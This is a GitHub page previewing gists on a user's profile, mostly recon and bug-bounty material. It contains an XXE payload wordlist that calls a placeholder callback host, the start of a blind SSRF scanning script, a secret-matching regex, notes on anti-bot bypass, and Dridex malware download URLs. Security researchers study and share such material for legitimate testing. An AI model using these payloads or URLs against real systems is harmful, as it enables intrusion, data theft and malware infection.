Skip to content

Instantly share code, notes, and snippets.

View ertanuj96's full-sized avatar
🎯
Focusing

Tanuj Sharma ertanuj96

🎯
Focusing
10 followers · 43 following
View GitHub Profile
@0xdevalias
0xdevalias / bypassing-cloudflare-akamai-etc.md
Last active October 5, 2025 20:34
Some notes/resources for bypassing anti-bot/scraping features on Cloudflare, Akamai, etc.
@h4x0r-dz
h4x0r-dz / Generic keys
Created May 5, 2022 09:15
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@tripleee
tripleee / Unicode_KrutiDev_converter.py
Last active August 15, 2025 11:14
Python3 version of Unicode <=> KrutiDev converter
# KrutiDev to Unicode function
def KrutiDev_to_Unicode(krutidev_substring):
modified_substring = krutidev_substring
array_one = ["ñ","Q+Z","sas","aa",")Z","ZZ","‘","’","“","”",
"å", "ƒ", "„", "…", "†", "‡", "ˆ", "‰", "Š", "‹",
"¶+", "d+", "[+k","[+", "x+", "T+", "t+", "M+", "<+", "Q+", ";+", "j+", "u+",
@kirk-sayre-work
kirk-sayre-work / gist:88e58ec9163d1a6ff1fc84697a6731b7
Created September 23, 2020 20:53
Dridex Maldoc 2c57cdeb1938688244dcaf05544e47daef28a6cec2866a674df9b6a4ed45237a Download URLs (Partial)
Maldoc Hash: 2c57cdeb1938688244dcaf05544e47daef28a6cec2866a674df9b6a4ed45237a
2nd Stage URLs (Incomplete):
https://bangmaverpakkingen.nl/x9ulwaje.gif
https://contextoenergetico.com/f5vkf0.jpeg
https://demo.leoprim.com/v1hg2matx.txt
https://dev.konocell.net/k9ycxiyy.jpeg
https://en.ioho.me/u87o11.txt
https://glambooth.nl/md3op2f.txt
@PatrikFehrenbach
PatrikFehrenbach / Amass Config
Created September 23, 2020 15:43
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active
# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass
@honoki
honoki / xxe-payloads.txt
Last active July 29, 2025 07:13
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@hussein98d
hussein98d / ssrf.sh
Created May 7, 2020 02:09
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
echo >&2 "ERROR: Domain not set"
exit 2
fi
if [ -z "$2" ]; then
echo >&2 "ERROR: Sever link not set"
exit 2
@gwen001
gwen001 / oparam.sh
Created December 5, 2019 14:15
onliner to extract params from url
echo "https://www.example.com/?aaa=bbb&ccc=ddd" | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}'
while read u; do echo $u | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}'; done < plainurls.txt | sort -fu
From wayback json file:
cat waybackurls.json|jq -r '.[]'|grep 'http'|cut -d '"' -f 2 | while read u; do echo $u | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}'; done | sort -fu
function oparam {
echo $1 | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}'
}
@nullenc0de
nullenc0de / content_discovery_nullenc0de.txt
Last active April 2, 2025 06:37
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
@003random
003random / subdomains wildcard detection example
Created January 18, 2019 13:54
if [[ "$(dig @1.1.1.1 A,CNAME {test321123,testingforwildcard,plsdontgimmearesult}.$domain +short | wc -l)" -gt "1" ]]; then
echo "[!] Possible wildcard detected."
fi